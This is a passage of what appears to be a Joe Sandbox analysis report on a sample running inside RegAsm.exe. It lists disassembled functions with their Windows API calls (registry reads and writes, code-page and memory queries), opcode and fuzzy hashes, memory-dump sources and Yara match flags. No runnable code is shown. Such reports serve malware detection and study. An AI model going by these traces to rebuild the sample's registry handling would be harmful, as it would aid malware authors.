                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                          • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                          • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                          • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                          • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                          • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                          • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                          • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                          • RegQueryValueExA.KERNEL32 ref: 00413587
                                                          • RegCloseKey.KERNEL32(?), ref: 00413592
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                          • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                          • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                          • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                          • RegCloseKey.KERNEL32(?), ref: 00413535
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                          • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID:
                                                          • API String ID: 1818849710-0
                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                          APIs
                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-3916222277
                                                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                          APIs
                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-3916222277
                                                          • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                          • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                          • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                          • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: pQG
                                                          • API String ID: 176396367-3769108836
                                                          • Opcode ID: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                          • Opcode Fuzzy Hash: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: LCMapStringEx
                                                          • API String ID: 2568140703-3893581201
                                                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: LCMapStringEx
                                                          • API String ID: 2568140703-3893581201
                                                          • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                          • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                          • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                          • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                          Strings
                                                          • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountCriticalInitializeSectionSpin
                                                          • String ID: InitializeCriticalSectionEx
                                                          • API String ID: 2593887523-3084827643
                                                          • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                          • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                          • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                          • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                          • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                          • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                          • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                          APIs
                                                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: try_get_function
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2742660187-671089009
                                                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                          APIs
                                                          • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: try_get_function
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2742660187-671089009
                                                          • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                          • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                          • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                          • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                          APIs
                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                          APIs
                                                            • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                          • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                          • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                          • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                          • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                          APIs
                                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                          • _free.LIBCMT ref: 10006CD7
                                                          • _free.LIBCMT ref: 10006D0D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                            • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                            • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                          • _free.LIBCMT ref: 0044EFD0
                                                          • _free.LIBCMT ref: 0044F006
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                          • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                          • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                          • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                          • String ID:
                                                          • API String ID: 2279764990-0
                                                          • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                          • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                          • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                          • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                          APIs
                                                          • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB09
                                                          • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FormatFreeLocalMessage
                                                          • String ID:
                                                          • API String ID: 1427518018-0
                                                          • Opcode ID: 7f9bee940e8a8a92ed57f81d062a9c9c82dd8d556c187550d6f4a434c63788b8
                                                          • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                                          • Opcode Fuzzy Hash: 7f9bee940e8a8a92ed57f81d062a9c9c82dd8d556c187550d6f4a434c63788b8
                                                          • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
